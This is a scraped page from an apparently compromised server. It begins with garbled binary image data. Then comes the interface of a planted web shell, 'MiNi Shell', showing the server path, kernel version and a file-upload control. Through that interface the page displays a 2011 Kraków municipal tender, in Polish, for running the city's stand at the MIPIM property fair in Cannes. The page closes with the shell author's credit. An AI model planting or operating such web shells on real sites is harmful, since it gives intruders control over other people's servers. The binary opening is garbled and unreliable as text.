JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110208/45527-N-2011.html

<p class="kh_header"><b>Kraków: Kompleksowa usługa organizacji stoiska Miasta Krakowa na Międzynarodowych Targach Inwestycji i Nieruchomości MIPIM w Cannes
(Francja) odbywających się w dniach 8-11 marca 2011</b><br>
<b>Numer ogłoszenia: 45527 - 2011; data zamieszczenia: 08.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kraków, Urząd Miasta Krakowa, Oddział Zamówień Publicznych , pl. Wszystkich Świętych 3-4, 31-004 Kraków, woj. małopolskie, tel. 012 6161230, faks 012 6161217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa organizacji stoiska Miasta Krakowa na Międzynarodowych Targach Inwestycji i Nieruchomości MIPIM w Cannes
(Francja) odbywających się w dniach 8-11 marca 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest wykonanie i kompleksowa organizacja stoiska Miasta Krakowa na Międzynarodowych Targach Inwestycji i Nieruchomości MIPIM w Cannes (Francja), odbywających się w dniach 8-11 marca 2011 r., zgodnie z przekazaną przez Zamawiającego koncepcją. Prace będą obejmować:
1.1. Wykonanie projektu wykonawczego i przekazanie go Zamawiającemu do akceptacji.
1.2. Wykonanie zabudowy stoiska zgodnie z zaakceptowanym projektem wykonawczym. 
1.3. Uwzględnienie w projekcie wykonawczym i zabudowie stoiska powierzonych przez Zamawiającego elementów wystawienniczych.
1.4. Wykonanie niezbędnych druków wielkoformatowych w postaci zdjęć, zdjęć lotniczych, map, szkiców rysunków i innych grafik ujętych w projekcie lub zdjęć z materiałów dostarczonych przez Zamawiającego w okresie do 10 dni przed targami, a także innych elementów stoiska niezbędnych do jego prawidłowego funkcjonowania i spójnego wyglądu.
1.5. Wyposażenie stoiska w: 
- podłączenia prądowe,
- podłączenia wod.-kan.,
- podłączenia internetowe, wraz ze stacjonarnym sprzętem komputerowym umożliwiającym odtwarzanie plików: dvd, adobe flash player i power point (którego minimalne parametry i wymagane oprogramowanie zostaną szczegółowo określone przez Zamawiającego w ramach kontaktów roboczych) - dla co najmniej 3 stanowisk komputerowych,
- wysokiej jakości sprzęty RTV /video umożliwiające prawidłowe publiczne wyświetlanie, w tym projektory multimedialne lub plazmy o wysokiej rozdzielczości,
- sprzęty gospodarcze niezbędne do organizacji i funkcjonowania kawiarenki,
- meble, 
- oświetlenie,
- zieleń i inne dekoracje,
- oraz inne przewidziane elementy wystroju wynikające z projektu i wymogów Organizatora Targów.
1.6. Przygotowanie, zaopatrzenie i obsługa kawiarenki na stoisku w czasie trwania targów, w godzinach otwarcia stoiska targowego. W barze powinny znaleźć się minimum: kawa, herbata, soki owocowe, woda mineralna, przekąski typu paluszki, chipsy, ciasteczka, kanapki, alkohol. Pożądane są produkty pochodzenia polskiego - uwzględniające w menu specyfikę regionu krakowskiego, w ilości zabezpieczającej potrzeby Zamawiającego i wszystkich jego gości (około 50 osób dziennie).
1.7. Wypełnienie i wysłanie dokumentów technicznych wymaganych przez Organizatora targów zawartych w katalogu technicznym lub innej dokumentacji dostępnej na właściwej stronie internetowej i dokonania innych niezbędnych czynności formalno-prawnych koniecznych do prawidłowego ulokowania i funkcjonowania stoiska.
1.8. Odbiór - z miejsc w Krakowie wskazanych przez Zamawiającego - powierzonych elementów wystawienniczych.
1.9. Załadunek i rozładunek oraz transport elementów zabudowy stoiska i powierzonych elementów wystawienniczych na targi oraz z powrotem do Krakowa (do miejsca wskazanego przez Zamawiającego wraz z rozładunkiem i załadunkiem ręcznym, wykonywanym samodzielnie przez ekipę Wykonawcy).
1.10. Montaż i demontaż elementów zabudowy stoiska w terminach przewidzianych w regulaminie targów.
1.11. Zabezpieczenie (opakowanie) do transportu i do magazynowania tych elementów wystroju stoiska, które Zamawiający przeznacza do dalszego wykorzystywania w przyszłości (w tym w szczególności elementów modułowych), celem ich ochrony przed uszkodzeniami i dostarczenia ich we wskazanym terminie (do miejsca wskazanego przez Zamawiającego).
1.12. Zapewnienie Obsługi stoiska - tj. minimum 3-ech osób (znających, w stopniu umożliwiającym prawidłową komunikację, język angielski).
1.13. Zapewnienie w czasie trwania targów specjalistycznych usług tłumaczeniowych w języku angielskim w zakresie procesu inwestycyjnego i brandigu terytorialnego (kwestie prawne, techniczne i marketingowe) - w wymiarze nieprzekraczającym 12 godzin dziennie. Szczegółowy harmonogram i czas trwania spotkań, na których wymagana będzie obecność tłumacza zostanie przekazany przez Zamawiającego w trakcie kontaktów roboczych.
1.14. Zapewnienie niezbędnych mediów (prąd, woda, Internet, inne) niezbędnych do prawidłowego funkcjonowania stoiska i pokrycie kosztów ich zamówienia i zużycia.
1.15. Przygotowanie i obsługa bankietu na około 70 osób na stoisku Krakowa w trakcie trwania targów w terminie ustalonym w trakcie kontaktów roboczych.
2. Wykonawca sporządzi dokumentację fotograficzną stoiska (dalej: dokumentacja fotograficzna) i przekaże ją Zamawiającemu w postaci zdjęć zapisanych elektronicznie w formacie .jpg. Dokumentacja fotograficzna zostanie przekazana Zamawiającemu wraz z autorskimi prawami majątkowymi do niej na warunkach określonych w umowie, w formie zapisu na CD lub w drodze przesyłki elektronicznej. Przekazanie dokumentacji fotograficznej nastąpi do 7 dni po zakończeniu targów.
3. Zamawiający nabędzie własność elementów zabudowy stoiska takich jak: modułowe (składane) grafiki wielkoformatowe, zdjęcia lub inne dekoracje z chwilą zapłaty faktury, o której mowa w § 9 ust. 1 pkt. 1 umowy. Lista elementów, których własność nabędzie Zamawiający, zostanie przekazana przez Wykonawcę Zamawiającemu w postaci dokumentu pisemnego stanowiącego oświadczenie woli Wykonawcy wraz z projektem wykonawczym stoiska.
4. Wykonawca, na żądanie Zamawiającego, przekaże Zamawiającemu sporządzoną przez siebie wycenę, kopie faktur, rachunków lub innych dowodów zakupu elementów zabudowy stoiska, których własność mu przekaże, wraz z opisem stanu przekazania i instrukcją przechowywania i montażu elementów.
5. Wykonawca świadczył będzie w trakcie trwania targów dodatkową usługę transportową polegającą na zapewnieniu samochodu osobowego (nadwozie min. 4-drzwiowe) wraz z kierowcą dla przedstawicieli Miasta Krakowa i ich gości z limitem 1000 kilometrów (w tym również paliwo, ubezpieczenie, opłaty drogowe)
6. Powierzchnia stoiska Miasta Krakowa na targach MIPIM w Cannes nr 2.1 wynosi 71,7 m2.
7. Organizatorem targów MIPIM w Cannes jest: 
REED MIDEM S.A.
75726 PARIS CEDEX 15
BP 572
11, rue du Colonel Pierre Avia
8. Szczegółowy opis przedmiotu zamówienia zawiera wzór umowy, stanowiący zał. nr 1 do niniejszej specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.60.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, w szczególności Wykonawca musi wykazać się wykonaniem - w okresie ostatnich trzech lat przed upływem terminu składania ofert (lub, jeśli okres działalności jest krótszy, to w tym okresie) - co najmniej:
a. trzech zagranicznych stoisk targowych o powierzchni minimum 50 m2 każde,
b. 10 grafik (wydruków) wielkoformatowych (o wymiarach minimum 1m2 każda),
c. zorganizowaniem 3 bankietów (koktajli, przyjęć) na przynajmniej 30 osób każdy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy.
2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik nr 2 do specyfikacji
3. Koncepcję oferty produktów spożywczych podawanych na stoisku Krakowa obejmującą:
a) Szczegółowy opis proponowanych regionalnych potraw oraz produktów spożywczych charakterystycznych dla Krakowa.
b) Opis menu serwowanego na każdy dzień targów.
c) Opis menu serwowanego w trakcie bankietu
4. Koncepcję - opis charakteru proponowanej obsługi recepcyjno - hostessowej stoiska obejmujący: ilość osób, ich doświadczenie w obsłudze stoisk (imprez) o podobnym charakterze, kwalifikacje w tym w szczególności znajomość języków obcych, opis ubioru osób obsługujących (elementy nawiązujące do tradycji Krakowa i projektu stoiska), inne dodatkowe propozycje Wykonawcy w zakresie obsługi stoiska.
5. Koncepcja - opis proponowanych rozwiązań multimedialnych, w tym wykaz proponowanych urządzeń multimedialnych.
6. Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Nowoczesność i innowacyjność zastosowanych rozwiązań multimedialnych - 20</li>
<li>3 - Atrakcyjność i różnorodność menu serwowanego na każdy dzień targów orz w trakcie bankietu na stoisku Krakowa na targach MIPIM w Cannes - 10</li>
<li>4 - Charakter proponowanej obsługi recepcyjno - hostessowej stoiska na targach MIPIM w Cannes - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1) w przypadku zmiany stawki podatku VAT w okresie obowiązywania niniejszej umowy,
2) innych, zwłaszcza sformułowanych przez Organizatora Targów, wymagań, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Krakowa, Plac Wszystkich Świętych 3-4, 31-004 Kraków, osoba do kontaktów: Dorota Turska-Graba, pokój nr 324.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2011 godzina 09:30, miejsce: Urząd Miasta Krakowa, Plac Wszystkich Świętych 3-4, Kancelaria Magistratu (parter), stanowisko nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Uwaga dot. sekcji II.2) ogłoszenia - termin wykonania zamówienia:
Usługa będzie realizowana od dnia podpisania umowy do 28 marca 2011 r.
Gotowość stoiska musi nastąpić w dniu poprzedzającym rozpoczęcie imprezy targowej, w miejscu przeprowadzenia targów, o godz.17:00.
Obsługa kawiarenki - w czasie trwania targów, tj. w dniach 8, 9, 10 marca 2011 r. w godzinach 9.00-19.00 oraz 11 marca 2011 w godzinach 9.00-16.00
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
W takim przypadku - oprócz dokumentów wymienionych w sekcji III.4) ogłoszenia - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa powyżej. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają:
2.1. każdy z osobna dotyczące ich dokumenty wymienione w sekcji III.4.2 ogłoszenia tiret drugi,
2.2. Oświadczenie Pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie art. 22 ust. 1 i 24 ust. 1 ustawy - wg załącznika 3 B do specyfikacji. 
3. dokumenty wskazane w sekcji III.4.1 ogłoszenia składają ci z wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com